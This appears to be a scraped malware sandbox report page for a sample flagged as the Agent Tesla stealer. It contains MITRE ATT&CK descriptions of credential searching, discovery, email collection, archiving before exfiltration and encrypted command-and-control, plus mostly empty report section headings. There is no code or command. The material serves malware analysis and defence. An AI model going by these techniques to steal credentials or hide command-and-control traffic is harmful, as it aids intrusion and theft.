Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report jF6LSw9bnC.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

SMTP Packets

Code Manipulations

Statistics

CPU Usage

Function 0106F3A9, Relevance: .6, Instructions: 623
COMMONCrypto

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre